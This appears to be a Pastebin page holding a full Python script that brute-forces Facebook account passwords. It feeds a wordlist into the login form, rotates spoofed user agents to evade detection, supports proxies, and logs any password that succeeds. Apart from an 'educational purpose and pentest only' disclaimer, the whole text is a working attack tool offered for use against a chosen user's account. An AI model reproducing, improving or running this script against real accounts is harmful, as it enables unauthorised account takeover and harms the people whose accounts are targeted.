API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 15th, 2015
148
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.26 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # This is facebook bruteforcer tools
  3. # This was written for educational purpose and pentest only. Use it at your own risk.
  4. # Author will not be responsible for any damage !!
  5. # Toolname : facebookbruteforcer.py
  6. # Programmer : Gunslinger_ <yudha.gunslinger@gmail.com>
  7. # Version : 1.0
  8. # Date : Tue Jul 27 13:24:44 WIT 2010
  9. # Special thanks to mywisdom to inspire me ;)
  10.  
  11. import re
  12. import os
  13. import sys
  14. import random
  15. import warnings
  16. import time
  17. try:
  18. import mechanize
  19. except ImportError:
  20. print("[*] Please install mechanize python module first")
  21. sys.exit(1)
  22. except KeyboardInterrupt:
  23. print("\n[*] Exiting program...\n")
  24. sys.exit(1)
  25. try:
  26. import cookielib
  27. except ImportError:
  28. print("[*] Please install cookielib python module first")
  29. sys.exit(1)
  30. except KeyboardInterrupt:
  31. print("\n[*] Exiting program...\n")
  32. sys.exit(1)
  33.  
  34. warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
  35.  
  36. # define variable
  37. __programmer__ = "gunslinger_ <yudha.gunslinger@gmail.com>"
  38. __version__ = "1.0"
  39. verbose = False
  40. useproxy = False
  41. usepassproxy = False
  42. log = 'fbbruteforcer.log'
  43. file = open(log, "a")
  44. success = 'http://www.facebook.com/?sk=messages&amp;ref=mb'
  45. fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
  46. # some cheating ..
  47. ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  48. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  49. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  50. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  51. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  52. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  53. 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  54. 'Opera/8.00 (Windows NT 5.1; U; en)',
  55. 'amaya/9.51 libwww/5.4.0',
  56. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  57. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  58. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  59. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  60. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  61. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
  62. ]
  63. facebook = '''
  64. __ _ _
  65. / _| | | | |
  66. | |_ __ _ ___ ___| |__ ___ ___ | | __
  67. | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
  68. | || (_| | (_| __/ |_) | (_) | (_) | <
  69. |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
  70. bruteforcer...
  71.  
  72. Programmer : %s
  73. Version : %s''' % (__programmer__, __version__)
  74. option = '''
  75. Usage : %s [options]
  76. Option : -u, --username <username> | User for bruteforcing
  77. -w, --wordlist <filename> | Wordlist used for bruteforcing
  78. -v, --verbose | Set %s will be verbose
  79. -p, --proxy <host:port> | Set http proxy will be use
  80. -k, --usernameproxy <username> | Set username at proxy will be use
  81. -i, --passproxy <password> | Set password at proxy will be use
  82. -l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
  83. -h, --help <help> | Print this help
  84.  
  85. Example : %s -u brad@hackme.com -w wordlist.txt"
  86.  
  87. P.S : add "&" to run in the background
  88. ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
  89. hme = '''
  90. Usage : %s [option]
  91. -h or --help for get help
  92. ''' % sys.argv[0]
  93.  
  94. def helpme():
  95. print(facebook)
  96. print(option)
  97. file.write(facebook)
  98. file.write(option)
  99. sys.exit(1)
  100.  
  101. def helpmee():
  102. print(facebook)
  103. print(hme)
  104. file.write(facebook)
  105. file.write(hme)
  106. sys.exit(1)
  107.  
  108. for arg in sys.argv:
  109. try:
  110. if arg.lower() == '-u' or arg.lower() == '--user':
  111. username = sys.argv[int(sys.argv[1:].index(arg))+2]
  112. elif arg.lower() == '-w' or arg.lower() == '--wordlist':
  113. wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
  114. elif arg.lower() == '-l' or arg.lower() == '--log':
  115. log = sys.argv[int(sys.argv[1:].index(arg))+2]
  116. elif arg.lower() == '-p' or arg.lower() == '--proxy':
  117. useproxy = True
  118. proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
  119. elif arg.lower() == '-k' or arg.lower() == '--userproxy':
  120. usepassproxy = True
  121. usw = sys.argv[int(sys.argv[1:].index(arg))+2]
  122. elif arg.lower() == '-i' or arg.lower() == '--passproxy':
  123. usepassproxy = True
  124. usp = sys.argv[int(sys.argv[1:].index(arg))+2]
  125. elif arg.lower() == '-v' or arg.lower() == '--verbose':
  126. verbose = True
  127. elif arg.lower() == '-h' or arg.lower() == '--help':
  128. helpme()
  129. elif len(sys.argv) <= 1:
  130. helpmee()
  131. except IOError:
  132. helpme()
  133. except NameError:
  134. helpme()
  135. except IndexError:
  136. helpme()
  137.  
  138. def bruteforce(word):
  139. try:
  140. sys.stdout.write("\r[*] Trying %s... " % word)
  141. file.write("[*] Trying %s\n" % word)
  142. sys.stdout.flush()
  143. br.addheaders = [('User-agent', random.choice(ouruseragent))]
  144. opensite = br.open(fblogin)
  145. br.select_form(nr=0)
  146. br.form['email'] = username
  147. br.form['pass'] = word
  148. br.submit()
  149. response = br.response().read()
  150. if verbose:
  151. print(response)
  152. if success in response:
  153. print("\n\n[*] Logging in success...")
  154. print("[*] Username : %s" % (username))
  155. print("[*] Password : %s\n" % (word))
  156. file.write("\n[*] Logging in success...")
  157. file.write("\n[*] Username : %s" % (username))
  158. file.write("\n[*] Password : %s\n\n" % (word))
  159. sys.exit(1)
  160. except KeyboardInterrupt:
  161. print("\n[*] Exiting program...\n")
  162. sys.exit(1)
  163. except mechanize._mechanize.FormNotFoundError:
  164. print("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
  165. file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
  166. sys.exit(1)
  167. except mechanize._form.ControlNotFoundError:
  168. print("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
  169. file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
  170. sys.exit(1)
  171.  
  172. def releaser():
  173. global word
  174. for word in words:
  175. bruteforce(word.replace("\n",""))
  176.  
  177. def main():
  178. global br
  179. global words
  180. try:
  181. br = mechanize.Browser()
  182. cj = cookielib.LWPCookieJar()
  183. br.set_cookiejar(cj)
  184. br.set_handle_equiv(True)
  185. br.set_handle_gzip(True)
  186. br.set_handle_redirect(True)
  187. br.set_handle_referer(True)
  188. br.set_handle_robots(False)
  189. br.set_debug_http(False)
  190. br.set_debug_redirects(False)
  191. br.set_debug_redirects(False)
  192. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  193. if useproxy:
  194. br.set_proxies({"http": proxy})
  195. if usepassproxy:
  196. br.add_proxy_password(usw, usp)
  197. if verbose:
  198. br.set_debug_http(True)
  199. br.set_debug_redirects(True)
  200. br.set_debug_redirects(True)
  201. except KeyboardInterrupt:
  202. print("\n[*] Exiting program...\n")
  203. file.write("\n[*] Exiting program...\n")
  204. sys.exit(1)
  205. try:
  206. preventstrokes = open(wordlist, "r")
  207. words = preventstrokes.readlines()
  208. count = 0
  209. while count < len(words):
  210. words[count] = words[count].strip()
  211. count += 1
  212. except IOError:
  213. print("\n[*] Error: Check your wordlist path\n")
  214. file.write("\n[*] Error: Check your wordlist path\n")
  215. sys.exit(1)
  216. except NameError:
  217. helpme()
  218. except KeyboardInterrupt:
  219. print("\n[*] Exiting program...\n")
  220. file.write("\n[*] Exiting program...\n")
  221. sys.exit(1)
  222. try:
  223. print(facebook)
  224. print("\n[*] Starting attack at %s" % time.strftime("%X"))
  225. print("[*] Account for bruteforcing %s" % (username))
  226. print("[*] Loaded :",len(words),"words")
  227. print("[*] Bruteforcing, please wait...")
  228. file.write(facebook)
  229. file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
  230. file.write("\n[*] Account for bruteforcing %s" % (username))
  231. file.write("\n[*] Loaded : %d words" % int(len(words)))
  232. file.write("\n[*] Bruteforcing, please wait...\n")
  233. except KeyboardInterrupt:
  234. print("\n[*] Exiting program...\n")
  235. sys.exit(1)
  236. try:
  237. releaser()
  238. bruteforce(word)
  239. except NameError:
  240. helpme()
  241.  
  242. if __name__ == '__main__':
  243. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!